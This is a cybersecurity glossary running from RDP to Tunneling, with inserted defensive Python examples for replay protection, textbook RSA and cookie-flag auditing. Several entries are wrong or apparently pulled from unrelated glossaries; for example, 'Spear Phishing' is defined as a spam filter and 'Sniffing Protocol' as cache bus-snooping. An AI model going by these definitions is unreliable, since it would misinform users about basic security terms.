Remote Desktop Protocol - Abbreviated as RDP, the Microsoft Remote Desktop Protocol is a multi-channel protocol that allows a user to connect to a computer running Remote Desktop Services (formerly Terminal Services). It listens on TCP port 3389 by default. RDP was designed to support many network topologies, such as ISDN and POTS, and LAN protocols such as IPX, NetBIOS and TCP/IP. RDP endpoints exposed directly to the Internet are a frequent target of password brute-forcing and a common initial-access vector for ransomware, so they belong behind a VPN or gateway with multi-factor authentication.

Remote Diagnostics / Maintenance - This is a maintenance service carried on by authorized companies/individuals who use the Internet to communicate with the company’s network.

Remote Exploitation - Exploitation of a victim machine by sending specially crafted commands from a remote network to a service running on that machine to manipulate it for the purpose of gaining access or information.

Replay Attacks - An attack in which the attacker captures valid authentication data or other protocol messages in transit and re-transmits them later, so that the receiver accepts the replayed message as genuine. The aim is to gain unauthorized access or produce other malicious effects without ever learning the underlying credentials; defences bind a per-message nonce, a timestamp or a sequence number into a message authentication code so that a repeated message is recognised and rejected.
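The nonce-plus-timestamp defence described above, worked through as an added example (it is not code from the glossary). Both sides are shown: the client signs each request, and the server rejects tampered, stale and repeated messages. The shared key, the 30-second window and the message layout are assumptions for the demo.

```python
# Added example, not from the glossary: an HMAC-authenticated request format that
# defeats replay with a per-message nonce and a timestamp window.
import hashlib
import hmac
import os
import time
from typing import Dict, Optional, Tuple

SHARED_KEY = b"demo-shared-secret"  # assumed to be pre-shared out of band
MAX_SKEW_SECONDS = 30                # assumed acceptance window for a timestamp


def _mac(key: bytes, ts: str, nonce: str, body: bytes) -> str:
    # the MAC covers timestamp, nonce and body, so none of them can be altered in transit
    return hmac.new(key, ts.encode() + b"|" + nonce.encode() + b"|" + body, hashlib.sha256).hexdigest()


def sign_request(body: bytes, key: bytes = SHARED_KEY, now: Optional[float] = None) -> Dict[str, object]:
    """Client side: attach a fresh random nonce, the current time and a MAC over all three."""
    ts = str(int(time.time() if now is None else now))
    nonce = os.urandom(12).hex()
    return {"ts": ts, "nonce": nonce, "body": body, "mac": _mac(key, ts, nonce, body)}


class ReplayProtectedServer:
    """Server side: verify the MAC, reject stale timestamps, reject nonces already seen."""

    def __init__(self, key: bytes = SHARED_KEY, max_skew: int = MAX_SKEW_SECONDS):
        self.key = key
        self.max_skew = max_skew
        self.seen = {}  # nonce -> timestamp; entries older than the window are pruned

    def accept(self, msg: Dict[str, object], now: Optional[float] = None) -> Tuple[bool, str]:
        now = time.time() if now is None else now
        ts, nonce, body, mac = str(msg["ts"]), str(msg["nonce"]), msg["body"], str(msg["mac"])
        if not hmac.compare_digest(_mac(self.key, ts, nonce, body), mac):
            return False, "bad mac"          # forged or tampered message
        if abs(now - int(ts)) > self.max_skew:
            return False, "stale timestamp"  # a recording replayed long after capture
        # the timestamp check bounds how long a nonce has to be remembered
        self.seen = {n: t for n, t in self.seen.items() if now - t <= self.max_skew}
        if nonce in self.seen:
            return False, "replayed nonce"   # a recording replayed inside the window
        self.seen[nonce] = int(ts)
        return True, "ok"


if __name__ == "__main__":
    server = ReplayProtectedServer()
    captured = sign_request(b"transfer 100 to account 42")
    print(server.accept(captured))  # (True, 'ok'): the genuine request
    print(server.accept(captured))  # (False, 'replayed nonce'): the same bytes sent again
```

The order of the checks matters: the MAC is verified first so that an attacker cannot probe the nonce cache with forged messages, and the timestamp window is what allows the server to forget old nonces without reopening the replay hole.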

Reseller Hosting - Reseller hosting is a form of web hosting wherein the account owner has the ability to use his or her allotted hard drive space and bandwidth to host websites on behalf of third parties. The reseller purchases the host's services wholesale and then sells them to customers, possibly for a profit.

Residual Risk - The likelihood and impact of a threat that remains after security controls are implemented.

Residual Risk Assessment - An assessment, which is performed at the end of the system development lifecycle, to determine the remaining likelihood and impact of a threat.

Residual Risk Level - The degree of residual risk (e.g. high, medium, low).

Resilience - This is an organization’s or system’s ability to restore its ability to function and achieve its objectives during and after a cyber attack or other transformations. Resilience includes ensuring contingency plans, doing constant risk management and planning for every crisis scenario.

Reverse Engineering - This is a technique heavily used by cyber security researchers who constantly take malware apart to analyze it. This way, they can understand and observe how the malware works and can devise security solutions that can protect users against that type of malware and its tactics. This is one of the most valuable activities in cyber security intelligence gathering.

Risk Assessment - This is a risk analysis process that defines an organization’s cyber security risks and their potential impact. Security measures are then suited to match the importance and potential impact of the risks identified as a result of the risk assessment.

Risk Level - The degree of risk (e.g. high, medium, low).

Risk Management - This is the process by which an organization manages its cyber security risks to decrease their potential impact and take the adequate measures to avoid cyber attacks. Doing a risk assessment is also part of the process, as well as the risk mitigation strategy and all the procedures that must be applied in order to ensure proper defenses against cyber threats. This is a continuous process and should be viewed as a cycle.

Risk Mitigation - This is the process by which risks are evaluated, prioritized and managed through mitigation tactics and measures. Since any company has a dynamic environment, a periodical revision should be a defining characteristic of the risk mitigation process.

Rogue Security Software - Rogue security software is a common Internet scam used by cyber criminals to mislead victims and infect their PCs with malware. Malicious actors could also use fake antivirus to trick victims into paying money or extort them (like ransomware does) into paying for having the rogue software removed. So please only buy security software from trusted vendors or from the software makers themselves.

Rogueware - A type of deceitful malware that claims to be a trusted and harmless software program (such as an antivirus). Cyber criminals use rogueware to harvest data from their victims or to trick them into paying money. Often, rogueware also includes adware functions, which add a further burden and a potential risk to the infected PC.

Root Cause Analysis - This is the process used to identify the root causes for certain security risks in an organization. This must be done with the utmost attention to detail and by maintaining an objective perspective.

Rootkit - Software, usually but not always malicious, that gives an attacker privileged access to a computer while concealing its own presence. Rootkits load early, as kernel drivers or (in the case of bootkits) before the operating system boots, and are built to hide other programs, processes, files and network connections from traditional detection methods; a rootkit can thus cover up the fact that a PC has been compromised. Once attackers have gained administrator rights on the affected PC (through exploits or social engineering), a rootkit lets them maintain the infection for a long time, and rootkits are notoriously difficult to remove.

Routing Protocol - A generic term that refers to a formula, or protocol, used by a router to determine the appropriate path over which data is transmitted. The routing protocol also specifies how routers in a network share information with each other and report changes. The routing protocol enables a network to make dynamic adjustments to its conditions, so routing decisions do not have to be predetermined and static.

RSA - Rivest–Shamir–Adleman is an asymmetric (public-key) cryptographic algorithm used by modern computers to encrypt and decrypt messages and to create and verify digital signatures. Asymmetric means there are two different keys: a public key that can be given to anyone and a private key that must be kept secret, which is why this is also called public-key cryptography. Its security rests on the difficulty of factoring the product of two large primes.
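Textbook RSA on small numbers, as an added example that is not part of the glossary, to show the key relationship the entry describes and why the raw algorithm is never used as-is. The primes are the classic teaching values and are far too small for real use (real keys are 2048 bits or more); the function names are the example's own.

```python
# Added example, not from the glossary: textbook RSA key generation, encryption,
# signing and a demonstration of why unpadded RSA is unsafe.
import math
from typing import Tuple

Key = Tuple[int, int]  # (modulus n, exponent)


def generate_keypair(p: int, q: int, e: int = 65537) -> Tuple[Key, Key]:
    """Return (public, private). p and q must be distinct primes; e must be coprime to phi(n)."""
    n = p * q
    phi = (p - 1) * (q - 1)
    if math.gcd(e, phi) != 1:
        raise ValueError("e must be coprime to (p-1)(q-1)")
    d = pow(e, -1, phi)  # modular inverse: e*d == 1 (mod phi); needs Python 3.8+
    return (n, e), (n, d)


def encrypt(m: int, public: Key) -> int:
    n, e = public
    if not 0 <= m < n:
        raise ValueError("message must be an integer smaller than the modulus")
    return pow(m, e, n)


def decrypt(c: int, private: Key) -> int:
    n, d = private
    return pow(c, d, n)


def sign(m: int, private: Key) -> int:
    # signing is exponentiation with the private key; anyone can verify with the public one
    return pow(m, private[1], private[0])


def verify(m: int, signature: int, public: Key) -> bool:
    return pow(signature, public[1], public[0]) == m


def malleability_demo(public: Key, m1: int, m2: int) -> bool:
    """Unpadded RSA is homomorphic: E(m1) * E(m2) == E(m1 * m2) (mod n).
    An attacker can therefore forge the ciphertext of m1*m2 without the key,
    which is why real systems add OAEP (encryption) or PSS (signature) padding."""
    n, _ = public
    return (encrypt(m1, public) * encrypt(m2, public)) % n == encrypt((m1 * m2) % n, public)


if __name__ == "__main__":
    public, private = generate_keypair(61, 53, e=17)    # the classic textbook parameters
    print(public, private)                               # (3233, 17) (3233, 2753)
    c = encrypt(65, public)
    print(c, decrypt(c, private))                        # 2790 65
    s = sign(42, private)
    print(verify(42, s, public), verify(43, s, public))  # True False
    print(malleability_demo(public, 2, 3))               # True
```

Note what the malleability check demonstrates: with 61 and 53 the modulus is trivially factored, but even with a 2048-bit modulus the homomorphic property holds, so padding is a correctness requirement, not an optimisation.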

Rubbernecking - The physical act of craning one's neck to get a better view or to eavesdrop, whether out of curiosity or because something catches your eye. In a security setting it is the low-tech cousin of shoulder surfing: glancing at another person's screen, keyboard or documents.

Rule Based Anti-Phishing - Rule-based approaches to phishing attacks create a series of rules based on a variety of factors to detect phish. When new threats come in, more rules are created. Critics of the rule-based approach argue that over time, rules become complex and difficult to manage, and challenging to keep up-to-date.



Safeguards - This refers to a set of protection measures that have to meet an information system’s core security requirements, in order to ensure confidentiality, integrity, and availability. This includes everything from employee security to ensuring the safety of physical structures and devices, to management limitations and more.

Sandboxing - Sandboxing is a security technique, used in anti-malware products and elsewhere, that runs a potentially malicious file or program in an isolated environment (a virtual machine, container or restricted process) where it cannot reach the rest of the system. Its behaviour is observed there, so suspicious files can be identified and removed before they have had a chance to do damage; the same principle confines browsers and document viewers so that an exploit in them has limited reach.

Sanitize - Sanitization is a process through which data is irreversibly removed from media. The storage media is left in a re-usable condition in accordance with IT security policy, but the data that was previously on it cannot be recovered or accessed.

Scareware - This is a type of malware (or rogueware) that employs social engineering to intimidate and confuse victims through shock, anxiety, fear and time restrictions. The objective is to persuade victims into buying unwanted software, which could be rogue security software, ransomware or another type of malware. For example, malicious actors often try to convince users that their computer is infected with a virus and that the only way to get rid of it is to pay for, download and install a fake antivirus, which, of course, turns out to be the malware itself.

Scavenging - This is the action of trying to find confidential or sensitive data by searching through a system’s data residue.

Secondary DNS - A secondary server holds a secondary DNS zone—a read-only copy of the zone file, which contains the DNS records. It receives an updated version of the copy in an operation called zone transfer. Secondary servers can pass a change request if they wish to update their local copy of the DNS records. Secondary DNS servers are not mandatory—the DNS system can work even if only a primary server is available. But it is standard, and often required by domain registrars, to have at least one secondary server.

Security Controls - This is a set of safeguards designed to avoid and mitigate the impact of cyber security risks that an organization has.

Security Destruction - The destruction of information assets through one or more approved methods, carried out alone or in combination with erasing, to ensure that information cannot be retrieved.

Secure Cookie - A cookie that the browser will only send over an encrypted connection (HTTPS) and never over plain HTTP, which makes it far less likely to be exposed to cookie theft via eavesdropping. A cookie is made secure by adding the Secure attribute to the Set-Cookie header; it is usually paired with HttpOnly (not readable by script) and SameSite (not sent on cross-site requests).
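Building a hardened Set-Cookie header and auditing headers for the Secure attribute (and its usual companions HttpOnly and SameSite), as an added example that is not part of the glossary. The cookie names, the sample headers and the audit function names are constructed for the demo.

```python
# Added example, not from the glossary: issue a properly flagged session cookie and
# audit Set-Cookie headers for missing protections.
from typing import Dict, List, Tuple, Union

Attrs = Dict[str, Union[str, bool]]


def parse_set_cookie(header: str) -> Tuple[str, str, Attrs]:
    """Split 'name=value; Attr; Attr=val' into (name, value, {attr_lower: value_or_True})."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs: Attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() if val else True
    return name.strip(), value.strip(), attrs


def audit_set_cookie(header: str) -> List[str]:
    """Return a list of findings; an empty list means the cookie carries the expected protections."""
    name, _, attrs = parse_set_cookie(header)
    findings = []
    if "secure" not in attrs:
        findings.append("missing Secure: the browser will also send it over plain HTTP")
    if "httponly" not in attrs:
        findings.append("missing HttpOnly: readable from script, so XSS can steal it")
    if str(attrs.get("samesite", "")).lower() not in ("lax", "strict"):
        findings.append("SameSite not Lax/Strict: attached to cross-site requests (CSRF)")
    if name.startswith("__Host-") and (
        "secure" not in attrs or attrs.get("path") != "/" or "domain" in attrs
    ):
        findings.append("__Host- prefix used but its requirements (Secure, Path=/, no Domain) are not met")
    return findings


def build_session_cookie(name: str, value: str, max_age: int = 3600) -> str:
    """A session cookie the way it should be issued; the __Host- prefix binds it to this exact origin."""
    return f"{name}={value}; Path=/; Max-Age={max_age}; Secure; HttpOnly; SameSite=Lax"


if __name__ == "__main__":
    weak = "sessionid=8f1c2a9e; Path=/"                             # constructed weak header
    strong = build_session_cookie("__Host-sessionid", "8f1c2a9e")
    for finding in audit_set_cookie(weak):
        print("weak:", finding)
    print("strong:", audit_set_cookie(strong))  # []
```

Run the audit over the Set-Cookie headers your own application emits; any finding on a session or CSRF cookie is worth fixing before a pentester points it out.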

Secure Erasure - A digital sanitization process that uses tools and industry-standard commands (e.g. ATA security erase) to erase all accessible memory locations of a data storage device.

Secure Sockets Layer - Secure Sockets Layer (SSL) is the original standard for establishing an encrypted link between a server and a client, typically a web server (website) and a browser, or a mail server and a mail client (e.g. Outlook). Every SSL version is now deprecated and has been replaced by Transport Layer Security (TLS), although the name survives in product names and in the term "SSL certificate"; servers should disable SSL 2.0/3.0 and early TLS versions.

Security Impact analysis - An organization should always conduct a security impact analysis to determine if certain changes to the information systems have influenced and impacted its security state.

Security Tokens - Use of smart cards or other security tokens may improve security against replay attacks in the face of a successful keylogging attack, as accessing protected information would require both the (hardware) security token as well as the appropriate password/passphrase. Knowing the keystrokes, mouse actions, display, clipboard etc. used on one computer will not subsequently help an attacker gain access to the protected resource. Some security tokens work as a type of hardware-assisted one-time password system, and others implement a cryptographic challenge-response authentication, which can improve security in a manner conceptually similar to one time passwords.

Security Requirements - Security requirements are derived from multiple sources and make up for the security necessities of an information system, in order to ensure confidentiality, integrity, and availability of the information that’s managed, transmitted or stored in the system. The sources for security requirements can be legislation, directives, policies, standards, best practices, regulations, procedures or other business necessities.

Sensitive Information - This type of information is defined by the fact that not everyone can access it. Sensitive information is data that is confidential for a certain category of users, who can view, access and use this data. This type of information is protected for reasons either related to legal aspects or ethical ones. Examples include: personal identification numbers, health information, education records, trade secrets, credit card information, etc.

Sensor - Sensors can be placed in different locations around a network with the intention of collecting information and returning it to a central location for analysis and viewing.

SEO Poisoning - Malicious websites use search engine optimization tactics to make them show up prominently in search results. The sites are associated with terms that large numbers of people are likely to be using in searches at any given time, such as phrases related to holidays, news items and viral videos.

Separation of Duties - A security principle stating that sensitive or critical responsibilities should be shared by multiple entities (e.g. staff or processes), rather than a single entity, to prevent a security breach.

SERP - Search Engine Results Page(s) are the web pages served to users when they search for something online using a search engine. The user enters a search query, upon which the search engine presents them with a SERP.

Session Cookie - Web browsers normally delete session cookies when the user closes the browser. Unlike other cookies, session cookies do not have an expiration date assigned to them, which is how the browser knows to treat them as session cookies.

Server - In computing, a server is a computer program or a device that provides functionality for other programs or devices, called "clients". This architecture is called the client–server model, and a single overall computation is distributed across multiple processes or devices.

Service Level Agreement - Commitment between a service provider and a client. Particular aspects of the service – quality, availability, responsibilities – are agreed between the service provider and the service user. The most common component of an SLA is that the services should be provided to the customer as agreed upon in the contract.

Service Set Identifier - The service set identifier (SSID) defines a service set or extended service set. Normally it is broadcast in the clear by stations in beacon packets to announce the presence of a network and seen by users as a wireless network name.

SHA - Secure Hash Algorithm is an example of one type of hashing algorithm that is commonly used today. The 160-bit SHA was developed by the National Institute of Standards & Technology (NIST) in 1993, and SHA-1 was the first revision in 1994.

Shared Web Hosting - Shared web hosting service refers to a web hosting service where many websites reside on one web server connected to the Internet. This is generally the most economical option for hosting, as the overall cost of server maintenance is amortized over many customers.

Shoulder Surfing - Covertly peering over another person's shoulder.

Shylock - Shylock is a banking malware created to steal users’ banking credentials for fraudulent purposes. Shylock is based on the leaked ZeuS code and acts similarly to Zeus GameOver (created from the same malicious code), because it uses a domain generation algorithm (DGA) to hide its traffic and remain undetected by traditional antivirus and anti-malware solutions. Shylock is delivered mainly through drive-by downloads on compromised websites which are hit by malvertising, but also through malicious JavaScript injects.

SIEM Security Information and Event Management - In the field of computer security, security information and event management (SIEM) software products and services combine security information management and security event management. They provide real-time analysis of security alerts generated by applications and network hardware. SIEM software collects and aggregates log data generated throughout the organization’s technology infrastructure, from host systems and applications to network and security devices such as firewalls and antivirus filters.

Signature - In cyber security, a signature is an identifiable, differentiating pattern associated with a type of malware, an attack or a set of keystrokes which were used to gain unauthorized access to a system. For example, traditional antivirus solutions can spot, block and remove malware based on their signature, when the AV sees that a piece of software on your PC matches the signature of a malicious program stored in its database.

Single Sign-On - Authentication method that allows users to sign in using one set of credentials to multiple independent software systems. Using SSO means a user doesn't have to sign in to every application they use.

Skimming - Skimming happens when a malicious actor uses a tag reader in an unauthorized manner, in order to collect information about a person’s tag. The victim never knows or accepts to be skimmed. For example, card skimming is an illegal practice which consists of the illegal collection of data from a card’s magnetic stripe. This information can then be copied onto a blank card’s magnetic stripe and used by malicious actors to make purchases and withdraw cash in the name of the victim.

Slack Attacks - Slack is a cloud-based team collaboration service similar to instant messaging; its users can become victims of a phishing attack when a hacker sends malicious links or attachments through a direct message or a Slackbot reminder. Because most people associate phishing with email only, Slack attacks catch them off-guard and are often successful.

Smart Card - A smart card, chip card, or integrated circuit card (ICC) is a physical electronic authorization device, used to control access to a resource. It is typically a plastic credit card sized card with an embedded integrated circuit. Many smart cards include a pattern of metal contacts to electrically connect to the internal chip. Others are contactless, and some are both. Smart cards can provide personal identification, authentication, data storage, and application processing.

Smurf Attack - A basic smurf attack occurs when the attacker floods the target network with a continuous stream of ICMP request packets. Packets include a source address set to the network’s broadcast address, which prompts every device on the network that receives the request to issue a response. This causes a massive amount of traffic, which will eventually take the system down.

Sniffer - A sniffer is a tool used to monitor traffic over a network. It can be used legitimately, to detect issues with the data flow. But it can also be used by malicious actors, to harvest data that’s transmitted over a network.

Sniffing Protocol - Also referred to as a bus-snooping protocol, a protocol for maintaining cache coherency in symmetric multiprocessing environments. In a snooping system, all caches on the bus monitor (or snoop) the bus to determine if they have a copy of the block of data that is requested on the bus. Every cache has a copy of the sharing status of every block of physical memory it has. Multiple copies of a document in a multiprocessing environment typically can be read without any coherence problems; however, a processor must have exclusive access to the bus in order to write.

SoC - Stands for "System On a Chip." An SoC (pronounced "S-O-C") is an integrated circuit that contains all the required circuitry and components of an electronic system on a single chip. It can be contrasted with a traditional computer system, which is comprised of many distinct components. A desktop computer, for example, may have a CPU, video card, and sound card that are connected by different buses on the motherboard. An SoC combines these components into a single chip.

Social Engineering - In information security, social engineering is a form of psychological manipulation used to persuade people to perform certain actions or give away sensitive information. Manipulation tactics include lies, psychological tricks, bribes, extortion, impersonation and other types of threats. Social engineering is often used to extract data and gain unauthorized access to information systems, belonging either to single, private users or to organizations.

Spam - Spam is made up of unsolicited emails or other types of messages sent over the Internet. Spam is often used to spread malware and phishing, which is why you should never open, reply to or download attachments from spam messages. Spam can come your way in the form of emails, instant messages, comments, etc.

Spear Phishing - This is a type of program which can analyze emails and other types of messages (i.e. instant messages) to weed out spam. If spam filtering software decides to categorize a message as spam, it’ll probably move that message to a dedicated folder.

Specialized Dictionary - Concentrating on a small area of a subject.

Speech Recognition - Similar to on-screen keyboards, speech-to-text conversion software can also be used against keyloggers, since there are no typing or mouse movements involved. The weakest point of using voice-recognition software may be how the software sends the recognized text to target software after the recognition took place.

Spillage - Information spillage happens when data is moved from a safe, protected system to another system which is less secure. This can happen to all types of data, from health information to financial or personal data. If the system the data is moved to is less secure, people who should not have access to this information may be able to access it.

Socially Acceptable - Accepted within a social culture or subculture.

Social Engineering - Social engineering, in the context of information security, is the psychological manipulation of people into performing actions or divulging confidential information.

Social Science - Scientific study of human society and social relationships.

Sponsoring Department - Department which is facing the posted challenge and will fund the development of the proof of concept and prototype.

Spoofing - This is a compromise attempt during which an unauthorized individual tries to gain access to an information system by impersonating an authorized user. For example, email spoofing is when cyber attackers send phishing emails using a forged sender address. You might believe that you’re receiving an email from a trusted entity, which causes you to click on the links in the email, but the link may end up infecting your PC with malware.

Spy-phishing - This is a type of malware that employs tactics found in both phishing and spyware. By combining these cyber threats, spy-phishing is capable of downloading applications that can run silently on the victim’s system. When the victims open a specific URL, the malware will collect the data the victim puts into that website and send it to a malicious location (like a web server). This technique is used to extend the duration of the phishing attack, even after the phishing website has been taken down.

Spyware - Spyware is a type of malware designed to collect and steal the victim’s sensitive information, without the victim’s knowledge. Trojans, adware and system monitors are different types of spyware. Spyware monitors and stores the victim’s Internet activity (keystrokes, browser history, etc.) and can also harvest usernames, passwords, financial information and more. It can also send this confidential data to servers operated by cyber criminals, so it can be used in subsequent cyber attacks.

Stack - A protocol stack refers to a group of protocols that are running concurrently and are employed for the implementation of a network protocol suite. The protocols in a stack determine the interconnectivity rules for a layered network model such as the OSI or TCP/IP models.

SQL Injection - This is a tactic that uses code injection to attack applications which are data-driven. The maliciously injected SQL code can perform several actions, including dumping all the data in a database to a location controlled by the attacker. Through this attack, malicious hackers can spoof identities, modify data or tamper with it, disclose confidential data, delete and destroy the data or make it unavailable. They can also take control of the database completely.

SSH - Secure Shell remote login. SSH is a modern protocol designed to be more secure and safer than protocols such as FTP and Telnet. As such, the SSH protocol is replacing FTP and Telnet in many environments.

SSL Secure Socket Layer - SSL comes from Secure Sockets Layer, which is an encryption method to ensure the safety of the data sent and received between a user and a specific website. Encrypting this data transfer ensures that no one can snoop on the transmission and gain access to confidential information, such as card details in the case of online shopping. Legitimate websites use SSL (their addresses start with https) and users should avoid inputting their data in websites that don’t use SSL.

Static Routing - Static routing is a form of routing that occurs when a router uses a manually-configured routing entry, rather than information from dynamic routing traffic. In many cases, static routes are manually configured by a network administrator by adding in entries into a routing table, though this may not always be the case.

Stealware - This is a type of malware which is capable of transferring data or money to a third, malicious party. This type of malware usually targets affiliate transactions. It then uses an HTTP cookie to redirect the commission earned by an affiliate marketer to an unauthorized third party.

Steganography - The purpose of steganography is to conceal and deceive. It is a form of covert communication and can involve the use of any medium to hide messages. It’s not a form of cryptography, because it doesn’t involve scrambling data or using a key. Instead, it is a form of data hiding and can be executed in clever ways. Where cryptography is a science that largely enables privacy, steganography is a practice that enables secrecy – and deceit.

Strong Authentication - This is a specific requirement that calls for employing multiple authentication factors from different categories and sophisticated technology to verify an entity’s identity. Dynamic passwords, digital certificates, protocols and other authentication elements are part of strong authentication standards. This is especially applied in banking and financial services, where access to an account has to be tied to a real person or an organization.

Subsidiary - A business which has more than 50% of its ordinary shares or voting power owned by another business or individual.

System recovery - Characterizes the speed at which a DUT recovers from an overload condition. To test system recovery, send a stream of frames at a rate higher than the recorded throughput and measure delay, then reduce that rate and measure the delay again. The system recovery time is the difference in these two delay times.

System reset - Measures the speed at which a DUT recovers from a hardware or software reset or a power interruption. A System Reset test is performed by sending a continuous stream of frames during a reset process and monitoring the output until frames begin to be forwarded. The System reset measurement is the time between when the last frame of the initial stream and the first frame of the new stream are received.

Super Cookie - A super cookie is a cookie with an origin of a top-level domain (such as .com) or a public suffix. Ordinary cookies, by contrast, have an origin of a specific domain name.

Note: If an attacker takes control of a website, they can set a super cookie to disrupt or impersonate legitimate user requests to another website that shares the same top-level domain or public suffix as their malicious website.

Supply Chain Attack - This type of attack aims to inflict damage upon an organization by leveraging vulnerabilities in its supply network. Cyber criminals often tamper with hardware or software during the manufacturing stage to implant rootkits or tie in hardware-based spying elements. Attackers can later use these implants to attack the organization they’re after.

Suppression Measure - This can be any action or device used to reduce the security risks in an information system. This is part of the risk mitigation process, aimed at minimizing the security risks of an organization or information system.

Suspicious Files and Behavior - Suspicious behavior is identified when files exhibit an unusual behavior pattern. For example, if files start copying themselves to a system folder, this might be a sign that those files have been compromised by malware. Traditional antivirus solutions incorporate this type of detection to spot and block malware.

Switch - A switch is used to network multiple computers together. Switches made for the consumer market are typically small, flat boxes with 4 to 8 Ethernet ports. These ports can connect to computers, cable or DSL modems, and other switches. High-end switches can have more than 50 ports and often are rack mounted.

Symmetric Key - A cryptographic key used to perform the cryptographic operation and its inverse operation (e.g. encrypt and decrypt, create a message authentication code and verify the code).

SYN Flood - A SYN flood is a form of denial-of-service attack in which an attacker sends a succession of SYN requests to a target's system in an attempt to consume enough server resources to make the system unresponsive to legitimate traffic.

System Administrator / SysAdmin - The system administrator, also called a sysadmin, is a person in charge of all the technical aspects of an information system. This includes aspects related to configuration, maintenance, ensuring reliability and the resources necessary for the system to run at optimal parameters while respecting a budget, and more.

System Integrity - This state defines an information system which is able to perform its dedicated functions at optimal parameters, without intrusion or manipulation (either intended or not).

Tampering - The intentional activity of modifying the way an information system works, in order to force it to execute unauthorized actions.

Targeted Threat - Targeted threats are singled out because of their focus: they are usually directed at a specific organization or industry. These threats are also designed to extract sensitive information from the target, so cyber criminals take a long time to prepare them. They are carefully documented, so that the chances of a successful compromise are as high as possible. Targeted threats are delivered via email (phishing, vishing, etc.) and employ zero-days and other vulnerabilities to penetrate an information system, among many other methods. Government and financial organizations are the most frequent targets for this type of cyber threat.

Tarpitting - A tarpit is a service on a computer system that purposely delays incoming connections. The technique was developed as a defense against a computer worm, and the idea is that network abuses such as spamming or broad scanning are less effective, and therefore less attractive, if they take too long.

Technology - Practical application of science to commerce or industry. The science of applying scientific knowledge to practical problems. An innovation based in scientific and industrial progress. Specific information and know-how required for the development, production or use of a good or service.

Technology Readiness Levels - Technology readiness levels (TRLs) are a method for estimating the maturity of technologies during the acquisition phase of a program, developed at NASA during the 1970s. The use of TRLs enables consistent, uniform discussions of technical maturity across different types of technology.

Tempest - The name for specifications and standards for limiting the strength of electromagnetic emanations from electrical and electronic equipment which lead to reduced vulnerability to eavesdropping. This term originated in the U.S. Department of Defense.

Telemetry Data - Technologies that accommodate collecting information in the form of measurements or statistical data, and forward it to IT systems in a remote location. This term can be used in reference to many different types of systems, such as wireless systems using radio, ultrasonic or infrared technologies, or some types of systems operating over telephone or computer networks. Others may use different strategies like SMS messaging.

TeslaCrypt - TeslaCrypt is a ransomware Trojan, which was first designed to target computers that have specific computer games installed. However, in the past months, this strain of cryptoware has broadened its reach to affect all users (mainly Windows users), not just gamers. As with every other ransomware, TeslaCrypt creators use spam to distribute the infection and, once they get into the victim’s PC, all the data on the device will be encrypted and held hostage. The ransom can vary between $150 and $1000 worth of bitcoins, which the victim has to pay in order to get the decryption key. In March 2016, TeslaCrypt 4.0 emerged, featuring unbreakable encryption and rendering any available TeslaCrypt decoders useless.

Threat Event - An actual incident in which a threat agent exploits a vulnerability of an IT asset of value.

Threat and Risk Assessment - A process of identifying system assets and how these assets can be compromised, assessing the level of risk that threats pose to assets, and recommending security measures to mitigate threats.

Threat Source - This refers to the objective and method used by cyber attackers to exploit a security vulnerability or a certain context in order to compromise an information system. Triggering a system vulnerability may happen accidentally or on purpose.

Threat Shifting - This is the process of adapting protection measures in response to cyber attackers’ ever-changing tactics. Countermeasures must be constantly updated to meet the challenges posed by polymorphic malware.

Threat Scenario - A threat scenario draws information from all available resources and focuses on three key elements: Vulnerabilities, Threats and Impact. This helps associate a specific cyber threat with one or more threat sources, and establish priorities.

Threat Modeling - Threat modeling is a process by which potential threats, such as structural vulnerabilities or the absence of appropriate safeguards, can be identified, enumerated, and mitigations can be prioritized.

Threat Monitoring - During this process, security audits and other information in this category are gathered, analyzed and reviewed to see if certain events in the information system could endanger the system’s security. This is a continuous process.

Three-factor Authentication 3FA - The use of identity-confirming credentials from three separate categories of authentication factors – typically, the knowledge, possession and inherence categories.

Throughput - Throughput refers to how much data can be transferred from one location to another in a certain period of time. The throughput test measures the maximum rate at which the count of test frames transmitted by the DUT equals the number of frames sent to it by the test equipment. In other words, it determines the rate at which data can travel through the device under test with zero dropped packets. This measurement roughly translates into the available bandwidth.

Time Bomb - This is a type of malware that stays dormant on the system for a definite amount of time, until a specific event triggers it. This type of behavior is present in malware to make detection by security software more difficult.

Time-dependent password - This type of password can be either valid for a limited amount of time or it can be valid for use during a specific interval in a day. Time-dependent passwords are most often generated by an application and are part of the two-factor or multi-factor authentication mechanisms.

Transport Layer Security - Cryptographic protocol designed to provide communications security over a computer network. The protocol is widely used in applications such as email, instant messaging, and voice over IP, but its use as the Security layer in HTTPS remains the most publicly visible. The TLS protocol aims primarily to provide privacy and data integrity between two or more communicating computer applications. It runs in the application layer of the Internet and is itself composed of two layers: the TLS record and the TLS handshake protocols.

Token - In security, a token is a physical electronic device used to validate a user’s identity. Tokens are usually part of two-factor or multi-factor authentication mechanisms. Tokens can also replace passwords in some cases and can be found in the form of a key fob, a USB device, an ID card or a smart card.

Tracking Cookie - This type of cookie is placed on users’ computers during web browsing sessions. Its purpose is to collect data about the user’s browsing preferences on a specific website, so that the site can then deliver targeted advertising or improve the user’s experience on that website by delivering customized information.

Traffic Analysis - During this process, the traffic on a network is intercepted, examined and reviewed in order to determine traffic patterns and volumes and to extract relevant statistics about it. This data is necessary to improve the network’s performance, security and general management.

Traffic Encryption Key (TEK) - This is a term specific to network security, which denotes the key used to encrypt the traffic within a network.

Transmission Control Protocol/Internet Protocol TCP/IP - TCP/IP is the suite of communications protocols used to connect hosts on the Internet. TCP/IP uses several protocols, the two main ones being TCP and IP. TCP/IP is built into the UNIX operating system and is used by the Internet, making it the de facto standard for transmitting data over networks. Even network operating systems that have their own protocols, such as Netware, also support TCP/IP.

Transport Layer Security - Transport Layer Security, and its now-deprecated predecessor, Secure Sockets Layer, are cryptographic protocols designed to provide communications security over a computer network. Several versions of the protocols find widespread use in applications such as web browsing, email, instant messaging, and voice over IP.

Trojan - A Trojan Horse is a type of malware that acts according to the Greek legend: it camouflages itself as a legitimate file or program to trick unsuspecting users into installing it on their PCs. Upon doing this, users will unknowingly give unauthorized, remote access to the cyber attackers who created and run the Trojan. Trojans can be used to spy on a user’s activity (web browsing, computer activity, etc.), to collect and harvest sensitive data, to delete files, to download more malware onto the PC and more.

Tunneling - A communications technique that allows for the movement of data from one network to another. It involves allowing private network communications to be sent across a public network through a process called encapsulation.

